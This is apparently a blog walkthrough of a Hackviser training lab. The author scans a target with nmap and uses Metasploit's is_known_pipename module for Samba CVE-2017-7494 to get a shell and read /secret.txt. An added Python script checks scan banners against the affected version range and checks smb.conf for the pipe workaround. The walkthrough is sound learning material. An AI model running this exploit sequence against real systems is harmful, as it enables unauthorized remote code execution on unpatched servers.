May 14, 2026
Exploiting Samba RCE (CVE-2017-7494) | Hackviser Labs Walkthrough
Manohar T H
Samba is one of the most commonly used services in Linux environments for file and printer sharing. Because of how widely it is deployed, vulnerabilities in Samba can become extremely dangerous when exposed internally or externally.
In this Hackviser lab, the target was vulnerable to CVE-2017-7494, a remote code execution vulnerability affecting Samba versions between 3.5.0 and 4.6.4. The objective was simple: gain access to the target machine and retrieve the contents of /secret.txt.
This walkthrough follows the exact investigation process I used while solving the lab, including the observations, payload choices, and why certain steps were taken during exploitation.
Initial Recon
As usual, I started with a full Nmap scan against the target.
nmap -p- -A -sV 172.20.19.172
Why these flags?
- -p- → scan all 65535 ports
- -A → enable OS detection, scripts, and traceroute
- -sV → detect service versions
The scan returned:
At this point, port 445 immediately stood out, because the lab description itself mentioned a vulnerable Samba range that includes version 4.6.3.
So instead of spending time enumerating SSH or looking for weak credentials, I shifted directly toward Samba exploitation.
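As an added example (not part of the original walkthrough), this is the version-matching step as a small Python triage script: it parses nmap -sV style Samba banners and checks them against the CVE-2017-7494 window the post describes. It goes a little beyond the post by also honouring the patched 4.5.10 and 4.4.14 backports from the Samba advisory and by checking an smb.conf for the advisory's nt pipe support = no workaround; the sample banners are constructed, not the lab's real scan output.

```python
import re

# Affected window for CVE-2017-7494: 3.5.0 up to the fixed release of each branch.
# The fix shipped in 4.6.4 and was backported to 4.5.10 and 4.4.14 (Samba advisory).
FIRST_AFFECTED = (3, 5, 0)
FIXED_BY_BRANCH = {(4, 6): (4, 6, 4), (4, 5): (4, 5, 10), (4, 4): (4, 4, 14)}
FIXED_MAINLINE = (4, 6, 4)

# Version token in an nmap -sV banner such as "Samba smbd 4.6.3 (workgroup: WORKGROUP)".
_BANNER_RE = re.compile(r"Samba\s+smbd\s+(\d+)\.(\d+)\.(\d+)")

def parse_samba_version(banner):
    """(major, minor, patch) from a banner, or None for a fuzzy 'Samba smbd 3.X - 4.X'."""
    m = _BANNER_RE.search(banner)
    return tuple(int(x) for x in m.groups()) if m else None

def is_affected(version):
    """True when an exact version falls inside the affected window for its branch."""
    if version < FIRST_AFFECTED:
        return False
    fixed = FIXED_BY_BRANCH.get(version[:2])
    if fixed is not None:
        return version < fixed
    # Branches older than 4.4 never received a fix; 4.7 and later shipped with it.
    return version < FIXED_MAINLINE

def triage(banner):
    """Classify a scan line: 'affected', 'not_affected', or 'unknown' (verify on host)."""
    v = parse_samba_version(banner)
    if v is None:
        return "unknown"
    return "affected" if is_affected(v) else "not_affected"

def has_pipe_workaround(smb_conf):
    """Detect the advisory's [global] workaround 'nt pipe support = no' in smb.conf text."""
    return re.search(r"^\s*nt\s+pipe\s+support\s*=\s*no\s*$", smb_conf, re.I | re.M) is not None

# Constructed sample banners in nmap -sV style; not the lab's real scan output.
SAMPLE_BANNERS = [
    "445/tcp open  netbios-ssn Samba smbd 4.6.3 (workgroup: WORKGROUP)",
    "445/tcp open  netbios-ssn Samba smbd 4.4.14 (workgroup: WORKGROUP)",
    "445/tcp open  netbios-ssn Samba smbd 3.4.9 (workgroup: WORKGROUP)",
    "445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)",
]

if __name__ == "__main__":
    for line in SAMPLE_BANNERS:
        print(f"{triage(line):13s} {line}")
```

A fuzzy banner ("3.X - 4.X") is deliberately reported as unknown rather than guessed, since that is exactly the case where picking a module from the version alone wastes time.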
Searching for a Samba Exploit in Metasploit
Since this vulnerability is well-known and already has public exploit modules available, I decided to use Metasploit first before attempting any manual exploitation.
I launched Metasploit:
msfconsole
Then I searched for Samba-related exploits:
search type:exploit samba
This returned several Samba modules.
After checking the results, the module matching this vulnerability was:
exploit/linux/samba/is_known_pipename
This module specifically targets the vulnerable Samba pipe handling issue related to CVE-2017-7494.
The module name looks a little unusual at first, but this exploit abuses how vulnerable Samba versions handle named pipes and shared libraries, eventually leading to remote code execution.
Selecting the Exploit Module
I loaded the exploit using:
use exploit/linux/samba/is_known_pipename
Before blindly setting values, I checked the required configuration options.
show options
This is an important habit during exploitation because every Metasploit module expects slightly different parameters.
The main options required here were:
- RHOST
- LHOST
- payload
Configuring the Exploit
What is RHOST?
RHOST means Remote Host.
This is simply the target machine we want to attack.
set RHOST 172.20.19.172
What is LHOST?
LHOST means **Local Host** (my own attacking machine's IP).
This tells the payload where to connect back after successful exploitation. In reverse shell scenarios, the victim machine needs to know where the attacker is listening.
set LHOST 172.20.19.53
Checking Payloads
I checked available payloads using:
show payloads
Interestingly, this module only exposed one payload option:
payload/cmd/unix/interact
So I kept the default payload and configured it explicitly anyway:
set payload payload/cmd/unix/interact
Why this payload?
This payload gives an interactive Unix command shell directly after exploitation. Since the goal of the lab was simply to retrieve a file from the system, a lightweight command shell was more than enough.
No need for Meterpreter or anything more advanced here.
Running the Exploit
Once everything was configured, I launched the exploit.
run
After a few seconds, Metasploit returned:
That message confirmed the exploit worked successfully and an interactive shell session was opened on the target machine.
At this stage, we essentially had remote command execution on the vulnerable Samba server.
Enumerating the Target
First thing I checked was the current working directory:
pwd
Output:
/tmp
Pretty normal for temporary exploit execution.
I moved one directory back and listed files:
cd ..
ls
While checking the directory contents, I noticed:
secret.txt
That was the target file mentioned in the lab objective.
So I simply read its contents using:
cat secret.txt
The file contained the required secret value for the challenge.
Final Thoughts
This lab was a straightforward example of how dangerous exposed Samba services can become when vulnerable versions are running internally or externally.
A few things stood out during the process:
- The Nmap version detection saved a lot of time
- Matching the Samba version directly against the CVE description quickly narrowed the attack path
- Using show options and show payloads helped avoid misconfigurations during exploitation
- The default payload was enough because the objective only required command execution and file access
One small thing I noticed while solving the lab was how easy it is to accidentally choose the wrong Metasploit module when multiple Samba exploits appear in search results. Taking a moment to verify the affected version range prevents wasting time debugging failed exploit attempts.